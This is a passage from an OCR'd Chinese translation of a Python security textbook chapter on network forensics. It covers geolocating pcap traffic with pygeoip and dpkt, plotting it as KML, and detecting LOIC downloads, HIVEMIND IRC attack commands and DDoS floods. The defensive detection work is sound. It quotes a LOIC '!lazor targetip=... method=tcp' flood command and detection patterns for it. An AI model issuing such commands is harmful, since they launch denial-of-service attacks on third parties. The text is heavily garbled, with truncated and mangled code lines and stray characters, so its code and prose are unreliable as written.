意 的 javascript 脚 本 并 连接 到 恶意 网 站 的 邮件 发 起 攻击 。 当 用 户 上 点击 该 链接 他 们 就 会 
下 载 一 个 恶意 软件 并 返回 一 个 控制 命令 行 到 中 国 的 服务 器 上 。 在 哪里 ， 攻 击 者 利用 
他 们 新 获得 权限 的 电脑 寻找 在 受害 者 系统 上 存储 的 私人 信息 。 


攻击 很 明显 的 出 现 了 但 是 几 个 月 未 被 发 现 ， 并 成 功 的 渗透 了 100 强 公司 的 代码 库 。 
甚至 是 基本 的 网 络 检测 软件 也 能 确认 这 次 行为 ， 为 什么 一 个 美国 100 强 公司 有 几 个 
用 户 连接 到 特定 的 台湾 站 点 然后 再 次 转 到 特定 的 中 国 服务 器 上 ? 一 个 可 视 化 的 地 图 
显示 用 户 连 接 台湾 和 中 国 具 有 显著 的 频率 可 以 允许 网 络 管理 员 调查 这 次 攻击 ， 并 在 
信息 丢失 前 停止 它 。` 在 下 面 的 章节 中 我 们 将 研究 利用 Python 分 析 不 同 的 攻击 ， 为 
了 快速 分 析 大 量 的 不 同 的 数据 点 。 让 我 们 开始 通过 建立 一 个 脚本 可 视 化 分 析 流 量 来 
开始 调查 ， 那 些 受 极光 行动 危害 的 100 强 管理 员 用 过 的 方法 。 


IP 流 量 头 去 哪 了 ? --- 一 个 Python 的 回答 


首先 我 们 必须 知道 怎样 将 网 络 IP 地 址 和 物理 位 置 相关 联 起 来 。 为 此 ， 我 们 将 依赖 一 
个 免费 的 数据 库 ，MaxMind，MaxMind 提 供 了 一 些 精 确 的 商业 产品 ， 他 的 开源 
GeoLiteCity 数 据 库 在 http:/www.maxmind.com/app/geolitecity 可 获得 ， 为 我 们 提 
供 了 足够 的 精确 度 从 IP 地 址 到 物理 地 址 。 一 旦 数据 库 被 下 载 ， 我 们 需要 解压 它 并 把 
它 移动 到 其 他 位 置 ， 如 /opt/Geoip/Gro.dat ° 


analyst# wget http://geolite.maxmind.com/download/geoip/database/ 
GeoLiteCity.dat.gz 

--2012-03-17 09:02:20-- http://geolite.maxmind.com/download/geoip/ 
database/GeoLiteCity.dat.gz 

Resolving geolite.maxmind.com... 174.36.207.186 

Connecting to geolite.maxmind.com|174.36.207.186|:80... connected. 

HTTP request sent, awaiting response... 200 OK 

Length: 9866567 (9.4M) [text/plain] 

Saving to: 'GeoLiteCity.dat.gz' 


9,866,567 724K/s in 15s k 
2012-03-17 09:02:36 (664 KB/s) - 'GeoLiteCity.dat.gz' saved 
[9866567/9866567 | 
analyst#gunzip GeoLiteCity.dat.gz 
analyst#mkdir /opt/GeoIP 
analyst#mv GeoLiteCity.dat /opt/GeoIP/Geo.dat 


Ay | 


利用 我 们 的 GeoIP 数据 库 ， 我 们 可 以 关联 一 个 |P 地 址 到 国家 ， 邮 政 代 码 ， 城 市 名 
和 一 般 的 经 纬度 坐标 。 所 有 的 这 一 切 将 在 IP 力量 分 析 中 用 到 。 


使 用 PyGeolP 关 联 IP 地 址 到 物理 地 址 


Jennifer Ennis 制 作 了 一 个 纯 Python 模 块 用 来 查询 GeoLiteCity 数 据 库 。 她 的 模块 能 
从 http://code.google.com/p/pygeoip/ 下 载 ， 安 装 并 导入 到 我 们 的 Python 脚本 中 。 

注意 ， 我 们 将 首先 实例 化 一 个 GeoIP 类 ， 用 本 地 的 GeoIP 的 位 置 。 接 下 来 我 们 

将 为 特殊 的 记录 指定 |P 地 址 查询 数据 库 。 它 将 返回 一 个 记录 包含 城市 ( city )， 地 
区 名 ( region_name )， 邮 编 ( postal_code )， 国 家 ( country_name )， 经 纬度 

( latitude and longitude ) 以 及 其 他 的 确认 信息 。 


import pygeoip 
gi = pygeoip.GeoIP('/opt/GeoIP/GeoIP.dat' ) 
def printRecord(tgt): 
rec = gi.record_by_addr(tgt) 
city = rec['city'] 
region = rec['region_name' ] 
country = rec['country_name' ] 
long = rec['longitude' ] 
lat = rec['latitude' ] 
print('[*] Target: ' + tgt + ' Geo-located. ') 
print(’[+] '+str(city)+', '+str(region)+', ‘+str(country)) 
print('[+] Latitude: '+str(lat)+ ', Longitude: '+ str(long)) 
tgt = '173.255.226.98' 
printRecord(tgt) 


运行 我 们 的 脚本 ， 我 们 可 以 看 到 它 产 生 输 出 显示 目标 IP 的 物理 位 置 。 现 在 我 们 可 以 
将 IP 地 址 和 物理 位 置 关 联 在 一 起 ， 让 我 们 开始 编写 我 们 的 分 析 脚 本 。 


analyst# python printGeo.py 

[*] Target: 173.255.226.98 Geo-located. 
[+] Jersey City, NJ, United States 

[+] Latitude: 40.7245, Longitude: -74.0621 


使 用 Dpkt 解 析 数 据 包 


在 下 面 的 章节 中 ， 我 们 将 主要 使 用 Scapy 数据 包 操作 工具 来 分 析 和 制作 数据 

包 。 Scapy 提供 了 强大 的 功能 ， 新 手 往往 会 发 现在 Windows 或 者 Mac OS X 系 统 上 
安装 非常 困难 ， 相 比 之 下 ， Dpkt 则 很 简单 ， 可 以 从 
http://code.google.com/p/dpkt/ 下 载 安装 。 两 个 都 提供 类 似 的 功能 ， 但 是 在 工具 集 
中 它 会 比较 有 用 。Dug Song 最 初创 建 Dpkt ZÆ > Jon Oberheide 增 加 了 许多 额外 
的 功能 用 来 解析 不 同 的 协议 ， 如 FTP，SCTP，BPG，IPv6，H.225 ° 


例如 ， 让 我 们 假设 一 下 我 们 捕获 并 记录 了 一 个 我 们 想 要 分 析 的 网 络 数据 包 为 pcap 格 
式 。 Dpkt 允许 我 们 遍历 每 一 个 捕获 的 数据 包 并 检查 每 一 个 协议 层 。 在 这 个 例子 
中 ， 虽 然 我 们 只 是 简单 的 读 取 先 前 捕获 的 PCAP 数 据 包 ， 我 们 可 以 很 容易 的 使 

用 pypcap TIAE ° TAM http://code.google.com/p/pypcap/ 下 载 。 为 了 读 取 
一 个 pcap 文 件 ， 我 们 实例 化 文件 ， 创 建 一 个 pcap.reader 类 对 象 ， 然 后 通过 我 们 
a xt Až printPcap() 。 这 个 对 象 pcap 包含 了 一 个 数组 ， 记 录 着 时 间 稚 和 数 
JEE > [timestamp, packet] 。 我 们 可 以 把 每 个 数据 包 分 为 以 太 层 和 |P 层 。 注 
意 ， 这 里 要 使 用 异常 处 理 ， 因 为 我 们 可 能 捕获 到 第 二 层 帧 ， 不 包含 IP 层 ， 这 有 可 能 
抛 出 一 个 异常 。 在 这 种 情况 下 ， 我 们 使 用 异常 处 理 捕获 异常 并 继续 下 一 个 数据 包 。 
我 们 使 用 socket 库 解析 IP 地 址 。 最 后 我 们 打印 每 个 数据 包 的 源 地 址 和 目标 地 址 。 


import dpkt 
import socket 


def printPcap(pcap): 
for (ts, buf) in pcap: 

try: 
eth = dpkt.ethernet.Ethernet (buf) 
ip = eth.data 
src = socket.inet_ntoa(ip.src) 
dst = socket.inet_ntoa(ip.dst) 
print( Al) Sre * = sires > DSE * -+ dst) 

except: 
pass 


def main(): 
f = open('data.pcap' ) 
pcap = dpkt.pcap.Reader(f) 
printPcap(pcap) 
if _name__ == '__main_': 
main() 


运行 该 脚本 ， 我 们 可 以 看 到 源 地 址 和 目标 地 址 打印 在 屏幕 上 。 这 为 我 们 提供 了 一 定 
程度 的 分 析 ， 现 在 让 我 们 使 用 我 们 先前 的 脚本 关联 IP 地 址 和 物理 地 址 。 


analyst# python printDirection.py 

[+] Src: 110.8.88.36 --> Dst: 188.39.7.79 

[+] Src: 28.38.166.8 --> Dst: 21.133.59.224 

[+] Src: 153.117.22.211 --> Dst: 138.88.201.132 
[+] Src: 1.103.102.104 --> Dst: 5.246.3.148 

[+] Src: 166.123.95.157 --> Dst: 219.173.149.77 
[+] Src: 8.155.194.116 --> Dst: 215.60.119.128 
[+] Src: 133.115.139.226 --> Dst: 137.153.2.196 
El sre: 217 301113 I -=> DSt: 63: 7/163 212 
[+] Src: 57.70.59.157 --> Dst: 89.233.181.180 


改善 我 们 的 脚本 ， 让 我 们 添加 一 个 额外 的 函数 retGeoStr() ， 通 过 IP 地 址 返回 物 
理 地 址 。 为 此 ， 我 们 将 简单 的 分 解 城 市 和 3 位 数 的 国家 代码 并 将 他 们 打印 到 屏幕 
上 。 如 果 函 数 抛 出 异常 ， 我 们 将 返回 消息 表示 该 地 址 未 注册 。 这 种 异常 是 地 址 不 
在 GeoIP 数据 库 中 或 者 是 局 域 网 |P 地 址 ， 如 192.168.1.3 ° 


# coding=UTF-8 
import dpkt 
import socket 
import pygeoip 
import optparse 


gi = pygeoip.GeoIP('/opt/GeoIP/GeoIP.dat' ) 


def retGeoStr(ip): 
try: 
rec = gi.record_by_name(ip) 
city = rec['city'] 
country = rec[ 'country_code3' ] 
if city != '': 
geoLoc = city + ', ' + country 
else: 
geoLoc = country 
return geoLoc 
except Exception as e: 
return 'Unregistered' 


def printPcap(pcap): 
for (ts, buf) in pcap: 


try: 
eth = dpkt.ethernet.Ethernet(buf) 
ip = eth.data 
src = socket.inet_ntoa(ip.src) 
dst = socket.inet_ntoa(ip.dst) 
Printe Sre: * = sre + ° ==> DSt: ' + dst) 
print(’ [+] Src: ' + retGeoStr(sre) + ' --> Dst: ' + rel 
except: 
pass 
def main(): 


parser = optparse.OptionParser('usage%prog -p <pcap file>') 
parser.add_option('-p', dest='pcapFile', type='string', help=': 
(options, args) = parser.parse_args() 
if options.pcapFile == None: 
print(parser.usage) 
exit(0) 
pcapFile = options.pcapFile 
f = open(pcapFile) 
pcap = dpkt.pcap.Reader(f) 


printPcap(pcap ) 
if _name__ == '_main_': 
main() 





运行 我 们 的 脚本 ， 我 们 可 以 看 到 我 们 的 数据 包 有 前 往 韩国 ， 伦 敦 ， 日 本 其 至 是 澳 大 
利 亚 的 。 这 为 我 们 提供 了 强大 的 分 析 工 具 。 然 而 ，Google 地 球 可 能 会 提供 更 好 的 方 
法 来 显示 相 同 的 信息 È 


analyst# python geoPrint.py -p geotest.pcap 

[+] Src: 110.8.88.36 --> Dst: 188.39.7.79 

[+] Src: KOR --> Dst: London, GBR 

[+] Src: 28.38.166.8 --> Dst: 21.133.59.224 

[+] Src: Columbus, USA --> Dst: Columbus, USA 
[+] Src: 153.117.22.211 --> Dst: 138.88.201.132 
[+] Src: Wichita, USA --> Dst: Hollywood, USA 
[+] Src: 1.103.102.104 --> Dst: 5.246.3.148 

[+] Src: KOR --> Dst: Unregistered 

[+] Src: 166.123.95.157 --> Dst: 219.173.149.77 
[+] Src: Washington, USA --> Dst: Kawabe, JPN 
[+] Src: 8.155.194.116 --> Dst: 215.60.119.128 
[+] Src: USA --> Dst: Columbus, USA 

[+] Src: 133.115.139.226 --> Dst: 137.153.2.196 
[+] Src: JPN --> Dst: Tokyo, JPN 

[+] Src: 217.30.118.1 --> Dst: 63.77.163.212 
[+] Src: Edinburgh, GBR --> Dst: USA 

[+] Src: 57.70.59.157 --> Dst: 89.233.181.180 
[+] Src: Endeavour Hills, AUS --> Dst: Prague, CZE 


使 用 Python 建立 Google 地 图 


Google 地 球 提供 了 一 个 虚拟 地 球 仪 ， 地 图 ， 地 理 信 息 ， 显 示 在 专门 的 视图 上 。 虽 然 
是 专门 的 ， 但 Google 地 球 却 可 以 很 容易 的 集成 定制 或 者 在 全 球 追 踪 。 创 建 一 个 扩展 
名 为 KML 的 文本 文件 ， 允 许 用 户 整 合 各 种 地 方 标识 到 Google 地 球 中 。KML 文 件 包含 
了 一 个 特定 的 XML 结构 ， 就 像 下 面 我 们 展示 的 那样 。 在 这 里 ， 我 们 展示 了 如 何在 地 
图 上 使 用 名 字 和 具体 坐标 绘制 具体 的 位 置 标 记 。 我 们 已 经 有 了 IP 地 址 ， 地 点 的 经 续 
度 ， 这 应 该 很 容易 集成 到 我 们 现 有 的 脚本 中 生成 KML 文 件 。 


<?xml version="1.0" encoding="UTF-8"?> 

<kml xmlns="http://www.opengis.net/kml/2.2"> 
<Document> 

<Placemark> 

<name>93.170.52.30</name> 

<Point> 
<coordinates>5. 750000, 52.500000</coordinates> 
</Point> 

</Placemark> 

<Placemark> 

<name>208.73.210.87</name> 

<Point> 

<coordinates>-122.393300, 37.769700</coordinates> 
</Point> 

</Placemark> 

</Document> 

</km1> 


让 我 们 快速 建立 一 个 函数 retKML() ， 将 IP 作 为 输入 返回 一 个 特殊 的 KML 结 构 。 请 
注意 ， 首 先 我 们 要 解决 的 是 使 用 pygeoip 获得 IP 地 址 的 经 纬度 。 然 后 我 们 可 以 为 

这 个 地 方 建立 我 们 的 KML 标 记 。 如 果 我 们 遇 到 弄 常 ， 例 如 “location not found,” > 将 
返回 空 字符 串 。 


def retKML(ip): 
rec = gi.record_by_name(ip) 
try: 
longitude = rec['longitude' ] 
latitude = rec['latitude' ] 
kml = ('<Placemark>\n' 
"<name>%s</name>\n' 
'<Point>\n' 
"<coordinates>%6f ,%*6f</coordinates>\n' 
'</Point>\n' 
'</Placemark>\n' 
) % (ip, longitude, latitude) 
return kml 
except Exception, e: 
return '' 


整合 所 有 的 功能 到 我 们 原始 的 脚本 。 我 们 现在 添加 特定 的 KML 头 和 尾 。 对 于 每 一 个 
数据 包 ， 我 们 创建 源 地 址 和 目标 地 址 的 KML 标 记 ， 并 在 地 图 上 绘制 。 这 样 就 产生 了 
一 个 美丽 的 网 络 流量 可 视 化 图 。 想 想 ， 所 有 扩展 这 些 的 方法 都 是 有 用 的 。 你 可 能 布 
望 用 不 同 的 图 片 标记 不 同类 型 的 流量 ， 特 定 的 源 地 址 和 目的 地 址 TCP 端 口 (比如 说 
web80 端 口 和 25 邮 件 端口 )。 可 以 参考 Google 的 KML 文 档 在 网 站 : 
https://developers.google.com/kml/documentation/ 并 想 想 我 们 扩展 我 们 可 视 化 视 
图 的 目的 。 


# coding=UTF-8 

import dpkt 

import socket 

import pygeoip 

import optparse 

gi = pygeoip.GeoIP('/opt/GeoIP/GeoIP.dat' ) 


def retKML(ip): 
rec = gi.record_by_name(ip) 
try: 
longitude = rec['longitude' ] 
latitude = rec['latitude' | 
kml = ('<Placemark>\n' 
"<name>%s</name>\n' 
'<Point>\n' 
"<coordinates>%6f ,%6f</coordinates>\n' 
'</Point>\n' 
'</Placemark>\n' 
) % (ip, longitude, latitude) 
return kml 
except Exception, e: 


return '' 


def plotIPs(pcap): 


kmlPts = '' 
for (ts, buf) in pcap: 
try: 
eth = dpkt.ethernet.Ethernet (buf) 
ip = eth.data 
src = socket.inet_ntoa(ip.src) 
SrcKML = retKML(src) 
dst = socket.inet_ntoa(ip.dst) 
dstKML = retKML(dst) 
kmlPts = kmlPts + srcKML + dstKML 
except: 


pass 
return kml1lPts 


def main(): 
parser = optparse.OptionParser('usage%prog -p <pcap file>') 
parser.add_option('-p', dest='pcapFile', type='string', help=': 
(options, args) = parser.parse_args() 
if options.pcapFile == None: 
print parser.usage 
exit(0) 
pcapFile = options.pcapFile 
f = open(pcapFile) 
pcap = dpkt.pcap.Reader(f) 


kmlheader = '<?xml version="1.0" encoding="UTF-8"?>\ 
\n<kml xmlins="http://www.opengis.net/km1/2.2">\n<Document>\n' 
kmlfooter = '</Document>\n</km1>\n' 
kmldoc=kmlheader+plotIPs(pcap)+kmlfooter 
print(kmldoc) 

if _name == ' main_': 
main() 





运行 我 们 的 脚本 ， 我 们 将 输出 内 容 到 KML 文 件 中 ， 用 Google 地 球 打 开 这 个 文件 ， 我 
们 可 以 看 到 我 们 数据 包 的 源 地 址 和 目的 地 。 在 下 一 节 中 ， 我 们 将 使 用 我 们 的 分 析 技 
能 侦查 Anonymous 组 织 在 全 球 的 威胁 。 


匿名 趴 的 是 匿名 了 么 ? 分 析 LOIC 流 量 


2010 年 12 月 ， 和 荷兰 警方 巡捕 了 一 名 青少年 参与 分 布 式 拒绝 服务 攻击 一 些 反 对 维基 解 
密 的 公司 。 不 到 一 个 月 ，FBI 发 处 了 40 多 份 搜查 令 ， 警 方 还 捕 了 同样 的 五 人 。 松 散 
的 黑客 组 织 Anonymous 下 载 并 使 用 LOIC 进 行 分 布 式 拒绝 服务 攻击 犯罪 。 


LOIC 发 送 大 量 的 TCP 和 UDP 流量 洪水 攻击 目标 。 一 个 单 义 的 LOIC 实 例 对 目标 消耗 
的 资源 很 小 ， 然 而 ， 当 成 千 上 万 的 人 同时 使 用 时 他 们 有 能 力 快速 耗 尽 目 标 资源 。 


LOIC 提 供 两 种 操作 模式 ， 第 一 中 模式 中 ， 用 户 可 以 输入 目标 地 址 ， 第 二 种 模式 称 为 
HIVEMIND， 用 户 连接 LOIC 到 一 个 目标 的 IRC 服 务 将 进行 自动 攻击 。 


使 用 Dpkt 找 到 谁 在 下 载 LOIC 


在 进行 操作 时 ，Anonymous 成 员 发 布 了 一 个 问题 文档 ， 关 于 LOIC 常 见 的 问题 的 回 
答 。 常 见 为 问题 有 : 使 用 LOIC 我 们 会 被 建 捕 吗 ? 可 能 性 几乎 为 零 。 只 要 说 是 中 了 病 
毒 或 者 干脆 否认 使 用 了 他 ， 在 这 一 节 中 ， 让 我 们 通过 良好 的 分 析 数 据 包 的 知识 并 编 
写 工 具 分 析 谁 下 载 和 使 用 了 LOIC 工 具 。 


互联 网 上 多 个 源 提供 LOIC 的 下 载 ， 一 些 更 为 可 信 。 可 以 从 sourceforge 主 机 下 载 
http://sourceforge.net/projects/loic/ ， 让 我 们 从 这 下 载 ， 下 载 前 ， 打 开 tcpdump 会 
话 ， 过 滤 80 端 口 ， 并 打印 结果 ， 你 可 以 看 到 一 下 结果 。 


analyst# tcpdump -i ethO -A 'port 80' 

17:36:06.442645 IP attack.61752 > downloads.sourceforge.net.http: 
Flags [P.], seq 1:828, ack 1, win 65535, options [nop,nop,TS Vi 
488571053 ecr 3676471943], length 827E..0..@.@........ Meee ape 

C2 $ 

..GET /project/loic/loic/loic-1.0.7/LOIC 1.0.7.42binary.zip 
?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Floic%2F&amp; ts=13: 

HTTP/1.1 

Host: downloads.sourceforge.net 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) 
AppleWebKit/534.53.11 (KHTML, like Gecko) Version/5.1.3 

Safari/534.53.10 


E 


第 一 部 分 我 们 是 发 现 LOIC 工 具 ， 我 们 将 编写 一 个 Python 脚本 来 解 本 HTTP 流量 ， 审 
查 HTTP 的 GET 头 是 否 有 LOIC 的 ZIP 二 进 制 。 为 此 ， 我 们 将 使 用 Dpkt È ° ATH 
查 HTTP 流 量 ， 我 们 必须 提取 以 太 网 协议 ，IP 协 议和 TCP 协 议 。 最 后 是 在 TCP 协 议 
之 上 的 HTTP 协 议 。 如 果 HTTP 层 用 GET 方 法 ， 我 们 解析 特定 的 URL 的 GET 请 求 。 如 
果 URI 包 含 .zip 和 LOIC 在 名 称 中 ， 我 们 打印 消息 在 屏幕 上 ， 显 示 下 载 LOIC 的 
IP。 折 可 以 帮助 聪明 的 管理 员 证 明 用 户 在 下 载 LOIC 而 不 是 因为 病毒 感染 。 接 合 第 三 
章 的 下 载 法 庭 取 证 分 析 ， 我 们 可 以 确认 用 户 下 载 了 LOIC 工 具 。 





import dpkt 
import socket 


def findDownload(pcap): 
for (ts, buf) in pcap: 


try: 
eth = dpkt.ethernet.Ethernet(buf) 
ip = eth.data 
src = socket.inet_ntoa(ip.src) 
tcp = ip.data 
http = dpkt.http.Request(tcp.data) 
if http.method == 'GET': 
uri = http.uri.lower() 
if '.zip' in uri and 'loic' in uri: 
print('[!] ' + src + ' Downloaded LOIC. ') 
except: 


pass 


f = open('LOIC.pcap') 
pcap = dpkt.pcap.Reader(f) 
findDownload(pcap) 


运行 该 脚本 ， 我 们 可 以 看 到 已 经 有 用 户 下 载 了 LOIC 工 具 。 


analyst# python findDownload.py 
[!] 192.168.1.3 Downloaded LOIC. 
[!] 192.168.1.5 Downloaded LOIC. 
[!] 192.168.1.7 Downloaded LOIC. 
[!] 192.168.1.9 Downloaded LOIC. 


解析 HIVE 模 式 的 IRC 命 令 


简单 的 下 载 LOIC 工 具 不 一 定 的 玛 违 法 的 。 然 而 ， 连 接 到 Anonymous 的 HIVE 并 启动 

分 布 式 拒绝 服务 攻击 进行 攻击 确实 违反 了 几 个 州 的 法 律 。 因 为 Anonymous 是 一 个 松 
散 的 志同道合 的 人 而 不 是 由 个 人 领导 的 黑客 组 织 。 任 何人 都 可 以 建议 对 目标 发 起 攻 

击 。 为 了 开始 发 动 一 次 攻击 ，Anonymous 成 员 登陆 到 一 个 特定 的 IRC 服 务 器 并 发 送 

攻击 指令 。 例 

如 !lazor targetip=66.211.169.66 message=test_test port=80 method=tcy 
。 任 何 用 LOIC 的 HIVEMIND 模 式 连接 到 IRC 的 成 员 都 能 立即 开始 攻击 目标 。 在 这 种 

情况 下 ， 可 以 指定 任何 攻击 目标 。 


在 tcpdump 中 检查 具体 的 攻击 信息 流量 ， 我 们 可 以 看 到 特定 的 用 户 anonOps 发 送 
了 一 个 开始 攻击 命令 。 接 下 来 ，IRC 服 务 器 发 送 发 送 命令 到 连接 的 LOIC 客 户 端 上 开 
始 攻击 。 想 像 一 下 在 一 个 很 长 的 包含 几 个 小 时 或 者 几 天 的 网 络 流量 的 pcap 文 件 中 找 
到 几 个 特定 的 数据 包 。 


analyst# sudo tcpdump -i ethO -A 'port 6667' 

08:39:47.968991 IP anonOps.59092 > ircServer.ircd: Flags [P.], seq 
3112239490:3112239600, ack 110628, win 65535, options [nop,nop, 
val 437994780 ecr 246181], length 110 

E05 ON Oi ey ee 中 

SE TOPIC #LOIC:!lazor targetip=66.211.169.66 message=test_ tesi 
port=80 method=tcp wait=false random=true start 

08:39:47.970719 IP ircServer.ircd > loic-client.59092: Flags [P.], 
seq 1:139, ack 110, win 453, options [nop,nop,TS val 260262 ec! 
437994780], length 138 

ES Am Cet eal es Vem amr ree pease weer Dn Kona 

Toei E.:kevin!kevin@anonOps TOPIC #loic:!lazor targetip=66.211.16( 

message=test_test port=80 method=tcp wait=false random=true start 





在 大 多 数 情况 下 ，IRC 服 务 使 用 的 是 TCP 6667 端 口 ， 消 息 到 IRC 服 务 器 的 目的 地 至 
是 TCP 的 6667 端 口 ， 从 IRC 返 回 的 消息 的 源 地 址 端口 应 该 是 TCP 的 6667 端 口 。 让 我 
们 利用 这 些 知识 来 编写 我 们 的 HIVEMIND 解 析 函 数 findHivemind() 。 这 一 次 ， 
我 们 提取 以 太 网 协议 ，IP 协 议和 和 TCP 协议 。 提 取 TCP 协 议 后 ， 我 们 在 探究 特定 的 源 
和 目的 端口 。 如 果 看 到 命令 I!1lazor 带 有 目的 端口 6667， 我 们 就 可 以 确认 成 员 发 
送 了 攻击 命令 。 如 果 我 们 看 到 !Lazor 带 有 源 目 的 地 端口 6667， 我 们 就 可 以 确定 
服务 器 发 送 了 成 员 攻 击 命令 。 


import dpkt 
import socket 


def findHivemind(pcap): 
for (ts, buf) in pcap: 
try: 
eth = dpkt.ethernet.Ethernet (buf) 
ip = eth.data 


src = socket.inet_ntoa(ip.src) 
dst = socket.inet_ntoa(ip.dst) 
tcp = ip.data 


dport = tcp.dport 
sport = tcp.sport 
if dport == 6667: 
if '!lazor' in tcp.data.lower(): 
print('[!] DDoS Hivemind issued by: '+src) 
print('[+] Target CMD: ' + tcp.data) 
if sport == 6667: 
if '!lazor' in tcp.data.lower(): 
print('[!] DDoS Hivemind issued to: '+src) 
print('[+] Target CMD: ' + tcp.data) 
except: 
pass 


识别 正在 进行 的 DDos 攻 击 


有 了 定位 下 载 LOIC 工 具 和 发 现 HIVE 命 令 的 功能 ， 最 后 一 项 任务 是 : 识别 正在 进行 
的 DDos 攻 击 。 当 一 个 用 户 开 始 了 一 个 LOIC 攻 击 ， 它 将 发 送 大 量 的 TCP 数 据 包 给 目 
标 主机 。 这 些 数据 包 ， 接 合 从 HIVE 来 的 集体 的 数据 包 基 本 耗 尽 了 目标 主机 的 资源 。 
我 们 开始 一 个 tcpdump 会 话 看 着 每 0.00005 秒 发 送 一 个 小 的 数据 包 。 这 种 行为 不 
断 的 重复 直到 攻击 结束 。 注 意 ， 目 标 无 法 相应 ， 每 次 只 就 收 5 个 数据 包 。 


analyst# tcpdump -i ethO 'port 80' 

06:39:26.090870 IP loic-attacker.1182 >loic-target.www: Flags [P.], 
336:348, ack 1, win 

64240, length 12 

06:39:26.090976 IP loic-attacker.1186 >loic-target.www: Flags [P.], 
336:348, ack 1, win 

64240, length 12 

06:39:26.090981 IP loic-attacker.1185 >loic-target.www: Flags [P.], 
301:313, ack 1, win 

64240, length 12 

06:39:26.091036 IP loic-target.www > loic-attacker.1185: Flags [.], 
313, win 14600, lengt 

h 0 

06:39:26.091134 IP loic-attacker.1189 >loic-target.www: Flags [P.], 
336:348, ack 1, win 

64240, length 12 

06:39:26.091140 IP loic-attacker.1181 >loic-target.www: Flags [P.], 
336:348, ack 1, win 

64240, length 12 

06:39:26.091142 IP loic-attacker.1180 >loic-target.www: Flags [P.], 
336:348, ack 1, win 

64240, length 12 

06:39:26.091225 IP loic-attacker.1184 >loic-target.www: Flags [P.], 
336:348, ack 1, win 

<.. REPEATS 1000x TIMES. .> 


加 pz 所 Hi 


让 我 们 快速 编写 一 个 发 现 正在 进行 DDos 攻 击 的 函数 。 为 了 发 现 一 个 攻击 ， 我 们 将 

设置 一 个 数据 包 阀 值 。 如 果 一 个 用 户 到 特定 地 址 的 的 数据 包 数 量 超过 该 阀 值 ， 这 表 
明 我 们 将 把 它 当 做 一 个 攻击 做 进一步 调查 。 但 是 ， 这 并 不 能 确定 用 户 发 起 了 攻击 。 
然而 ， 当 用 户 下 载 了 LOIC 工 具 ， 随 后 接受 了 HIVE 指 令 ， 然 后 是 实际 的 攻击 ， 这 足 
以 提供 证 据 用 户 参 与 了 一 次 匿名 的 DDos 攻 击 。 





import dpkt 
import socket 


THRESH = 10000 

def findAttack(pcap): 
pktCount = {} 
for (ts, buf) in pcap: 


try: 
eth = dpkt.ethernet.Ethernet (buf) 
ip = eth.data 
src = socket.inet_ntoa(ip.src) 
dst = socket.inet_ntoa(ip.dst) 
tcp = ip.data 
dport = tcp.dport 
if dport == 80: 
stream = src + ':' + dst 
if pktCount.has_key(stream): 
pktCount[stream] = pktCount[stream] + 1 
else: 
pktCount[stream] = 1 
except: 


pass 
for stream in pktCount: 
pktsSent = pktCount[stream] 
if pktsSent > THRESH: 
src = stream.split(':')[0] 
dst = stream.split(':')[1] 
print('[+] '+src+' attacked '+dst+' with ' + str(pktsSe 


Je — B 


将 我 们 的 代码 放 在 一 起 并 加 一 些 选项 解析 ， 我 们 的 脚本 现在 可 以 检测 下 载 ， 监 听 
HIVE 指 令 并 检测 攻击 。 





# coding=UTF-8 
import dpkt 
import socket 
import optparse 


def findDownload(pcap): 
for (ts, buf) in pcap: 
try: 
eth = dpkt.ethernet.Ethernet (buf) 
ip = eth.data 


src = socket.inet_ntoa(ip.src) 

tcp = ip.data 

http = dpkt.http.Request(tcp.data) 
if http.method == 'GET': 


uri = http.uri.lower() 
if '.zip' in uri and 'loic' in uri: 
print('[!] ' + src + ' Downloaded LOIC. ') 
except: 


pass 


THRESH = 10000 

def findAttack(pcap): 
pktCount = {} 
for (ts, buf) in pcap: 


try: 
eth = dpkt.ethernet.Ethernet (buf) 
ip = eth.data 
src = socket.inet_ntoa(ip.src) 
dst = socket.inet_ntoa(ip.dst) 
tcp = ip.data 
dport = tcp.dport 
if dport == 80: 
stream = src + ':' + dst 
if pktCount.has_key(stream): 
pktCount[stream] = pktCount[stream] + 1 
else: 
pktCount[stream] = 1 
except: 


pass 
for stream in pktCount: 
pktsSent = pktCount[stream] 
if pktsSent > THRESH: 
src = stream.split(':')[0] 
dst = stream.split(':')[1] 
print('[+] '+src+' attacked '+dst+' with ' + str(pktsSe 


def findHivemind(pcap): 
for (ts, buf) in pcap: 


try: 
eth = dpkt.ethernet.Ethernet (buf) 
ip = eth.data 
src = socket.inet_ntoa(ip.src) 
dst = socket.inet_ntoa(ip.dst) 
tcp = ip.data 
dport = tcp.dport 
sport = tcp.sport 
if dport == 6667: 
if '!lazor' in tcp.data.lower(): 
print('[!] DDoS Hivemind issued by: '+src) 
print('[+] Target CMD: ' + tcp.data) 
if sport == 6667: 
if '!lazor' in tcp.data.lower(): 
print('[!] DDoS Hivemind issued to: '+src) 
print('[+] Target CMD: ' + tcp.data) 
except: 
pass 
def main(): 


parser = optparse.OptionParser("usage%prog -p<pcap file> -t <tl 
parser.add_option('-p', dest='pcapFile', type='string', help=': 
parser.add_option('-t', dest='thresh', type='int', help='specii 


(options, args) = parser.parse_args() 
if options.pcapFile == None: 
print(parser.usage) 

exit(0) 
if options.thresh != None: 
THRESH = options.thresh 
pcapFile = options.pcapFile 
f = open(pcapFile) 
pcap = dpkt.pcap.Reader(f) 
findDownload(pcap ) 
findHivemind(pcap ) 
findAttack(pcap) 


if _name_ == '_main_': 
main() 
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运行 代码 ， 我 们 可 以 看 到 结果 。 四 个 用 户 下 载 了 工具 。 接 着 ， 不 同 的 用 户 发 送 攻击 
命令 给 另外 两 个 连接 着 的 攻击 者 ， 最 后 ， 这 两 个 攻击 者 实际 参与 了 攻击 。 因 此 现在 
的 脚本 识别 整个 DDos 攻 击 行动 。 虽 然 入 侵 检 测 系统 可 以 检测 类 似 的 活动 ， 但 编写 
一 个 自 定义 脚本 做 的 更 好 。 在 下 面 的 章节 中 ， 我 们 看 看 一 个 自 定义 脚本 ， 一 个 七 岁 
小 孩 编 写 的 用 来 保护 五 角 大 楼 的 脚本 。 


analyst# python findDDoS.py -p traffic.pcap 

[!] 192.168.1.3 Downloaded LOIC. 

[!] 192.168.1.5 Downloaded LOIC. 

[!] 192.168.1.7 Downloaded LOIC. 

[!] 192.168.1.9 Downloaded LOIC. 

[!] DDoS Hivemind issued by: 192.168.1.2 

[+] Target CMD: TOPIC #LOIC:!lazor targetip=192.168.95.141 message: 
